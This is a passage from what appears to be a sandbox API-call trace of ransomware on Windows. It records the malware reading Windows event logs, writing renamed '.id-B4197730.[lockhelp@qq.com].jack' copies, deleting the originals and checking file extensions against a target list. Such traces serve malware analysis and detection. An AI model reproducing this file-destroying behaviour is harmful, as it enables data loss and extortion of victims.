liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.491] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0207.491] GetLastError () returned 0x0 [0207.491] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0207.664] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0207.670] ReadFile (in: hFile=0x3e4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.670] WriteFile (in: hFile=0x404, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x12a, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x12a, lpOverlapped=0x0) returned 1 [0207.670] SetEndOfFile (hFile=0x404) returned 1 [0207.671] CloseHandle (hObject=0x404) returned 1 [0207.673] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.673] SetEndOfFile (hFile=0x3e4) returned 1 [0207.674] CloseHandle (hObject=0x3e4) returned 1 [0207.674] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0207.675] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx")) returned 1 [0207.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.675] lstrlenW (lpString=".doc") returned 4 [0207.675] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.675] lstrlenW (lpString=".docx") returned 5 [0207.675] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.675] lstrlenW (lpString=".pdf") returned 4 [0207.675] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.675] lstrlenW (lpString=".xls") returned 4 [0207.675] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.675] lstrlenW (lpString=".xlsx") returned 5 [0207.675] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.675] lstrlenW (lpString=".ppt") returned 4 [0207.675] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.675] lstrlenW (lpString=".zip") returned 4 [0207.676] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString=".rar") returned 4 [0207.676] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString=".bz2") returned 4 [0207.676] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString=".7z") returned 3 [0207.676] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.676] lstrlenW (lpString=".dbf") returned 4 [0207.676] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.676] lstrlenW (lpString=".1cd") returned 4 [0207.676] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.676] lstrlenW (lpString=".jpg") returned 4 [0207.676] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.676] lstrlenW (lpString=".doc") returned 4 [0207.676] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString=".docx") returned 5 [0207.676] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0207.676] lstrlenW (lpString=".pdf") returned 4 [0207.676] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString=".xls") returned 4 [0207.676] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0207.676] lstrlenW (lpString=".xlsx") returned 5 [0207.677] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0207.677] lstrlenW (lpString=".ppt") returned 4 [0207.677] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0207.693] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.693] lstrlenW (lpString=".zip") returned 4 [0207.693] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0207.693] lstrlenW (lpString=".rar") returned 4 [0207.693] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0207.693] lstrlenW (lpString=".bz2") returned 4 [0207.693] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0207.693] lstrlenW (lpString=".7z") returned 3 [0207.693] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0207.693] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.693] lstrlenW (lpString=".dbf") returned 4 [0207.693] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0207.693] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.693] lstrlenW (lpString=".1cd") returned 4 [0207.693] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0207.693] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0207.693] lstrlenW (lpString=".jpg") returned 4 [0207.693] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0207.693] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0207.693] lstrlenW (lpString="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 47 [0207.693] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0208.605] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0208.605] CloseHandle (hObject=0x434) returned 1 [0208.606] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 0x20 [0208.606] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.606] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0208.606] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.606] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.606] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0208.606] GetLastError () returned 0x0 [0208.606] ReadFile (in: hFile=0x434, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.626] WriteFile (in: hFile=0x40c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0208.628] ReadFile (in: hFile=0x434, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0208.628] WriteFile (in: hFile=0x40c, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x132, lpOverlapped=0x0) returned 1 [0208.628] SetEndOfFile (hFile=0x40c) returned 1 [0208.628] CloseHandle (hObject=0x40c) returned 1 [0208.630] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.630] SetEndOfFile (hFile=0x434) returned 1 [0208.631] CloseHandle (hObject=0x434) returned 1 [0208.631] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.632] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 1 [0208.632] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.632] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.632] lstrlenW (lpString=".doc") returned 4 [0208.632] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.632] lstrlenW (lpString=".docx") returned 5 [0208.632] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.632] lstrlenW (lpString=".pdf") returned 4 [0208.632] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.632] lstrlenW (lpString=".xls") returned 4 [0208.632] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.632] lstrlenW (lpString=".xlsx") returned 5 [0208.632] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.633] lstrlenW (lpString=".ppt") returned 4 [0208.633] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.633] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.633] lstrlenW (lpString=".zip") returned 4 [0208.633] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.633] lstrlenW (lpString=".rar") returned 4 [0208.633] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.633] lstrlenW (lpString=".bz2") returned 4 [0208.633] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.633] lstrlenW (lpString=".7z") returned 3 [0208.735] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.735] lstrlenW (lpString=".dbf") returned 4 [0208.735] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.736] lstrlenW (lpString=".1cd") returned 4 [0208.736] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.736] lstrlenW (lpString=".jpg") returned 4 [0208.736] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.736] lstrlenW (lpString=".doc") returned 4 [0208.736] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.736] lstrlenW (lpString=".docx") returned 5 [0208.736] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.736] lstrlenW (lpString=".pdf") returned 4 [0208.736] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.736] lstrlenW (lpString=".xls") returned 4 [0208.736] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.736] lstrlenW (lpString=".xlsx") returned 5 [0208.736] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.737] lstrlenW (lpString=".ppt") returned 4 [0208.737] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.737] lstrlenW (lpString=".zip") returned 4 [0208.737] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.737] lstrlenW (lpString=".rar") returned 4 [0208.737] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.737] lstrlenW (lpString=".bz2") returned 4 [0208.737] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.737] lstrlenW (lpString=".7z") returned 3 [0208.737] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.737] lstrlenW (lpString=".dbf") returned 4 [0208.737] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.737] lstrlenW (lpString=".1cd") returned 4 [0208.737] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0208.737] lstrlenW (lpString=".jpg") returned 4 [0208.737] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.737] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.737] lstrlenW (lpString="Microsoft-Windows-International%4Operational.evtx") returned 49 [0208.737] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0208.741] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0208.741] CloseHandle (hObject=0x40c) returned 1 [0208.741] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 0x20 [0208.742] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.742] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0208.742] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.742] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.742] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0208.743] GetLastError () returned 0x0 [0208.743] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.745] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0208.747] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0208.747] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x136, lpOverlapped=0x0) returned 1 [0208.748] SetEndOfFile (hFile=0x438) returned 1 [0208.748] CloseHandle (hObject=0x438) returned 1 [0208.753] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.753] SetEndOfFile (hFile=0x40c) returned 1 [0208.754] CloseHandle (hObject=0x40c) returned 1 [0208.755] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.755] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 1 [0208.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.755] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.755] lstrlenW (lpString=".doc") returned 4 [0208.755] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.755] lstrlenW (lpString=".docx") returned 5 [0208.755] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.755] lstrlenW (lpString=".pdf") returned 4 [0208.755] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.755] lstrlenW (lpString=".xls") returned 4 [0208.756] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString=".xlsx") returned 5 [0208.756] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.756] lstrlenW (lpString=".ppt") returned 4 [0208.756] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.756] lstrlenW (lpString=".zip") returned 4 [0208.756] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString=".rar") returned 4 [0208.756] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString=".bz2") returned 4 [0208.756] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString=".7z") returned 3 [0208.756] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.756] lstrlenW (lpString=".dbf") returned 4 [0208.756] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.756] lstrlenW (lpString=".1cd") returned 4 [0208.756] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.756] lstrlenW (lpString=".jpg") returned 4 [0208.756] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.756] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.756] lstrlenW (lpString=".doc") returned 4 [0208.756] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString=".docx") returned 5 [0208.757] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.757] lstrlenW (lpString=".pdf") returned 4 [0208.757] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString=".xls") returned 4 [0208.757] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString=".xlsx") returned 5 [0208.757] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.757] lstrlenW (lpString=".ppt") returned 4 [0208.757] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.757] lstrlenW (lpString=".zip") returned 4 [0208.757] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString=".rar") returned 4 [0208.757] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString=".bz2") returned 4 [0208.757] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString=".7z") returned 3 [0208.757] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.757] lstrlenW (lpString=".dbf") returned 4 [0208.757] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.757] lstrlenW (lpString=".1cd") returned 4 [0208.757] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.757] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0208.757] lstrlenW (lpString=".jpg") returned 4 [0208.757] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.758] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.758] lstrlenW (lpString="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 47 [0208.758] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0208.758] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0208.758] CloseHandle (hObject=0x40c) returned 1 [0208.758] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 0x20 [0208.759] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.759] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0208.759] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.759] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.759] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0208.759] GetLastError () returned 0x0 [0208.759] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0208.883] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.385] ReadFile (in: hFile=0x40c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.385] WriteFile (in: hFile=0x438, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x132, lpOverlapped=0x0) returned 1 [0209.385] SetEndOfFile (hFile=0x438) returned 1 [0209.386] CloseHandle (hObject=0x438) returned 1 [0209.389] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.389] SetEndOfFile 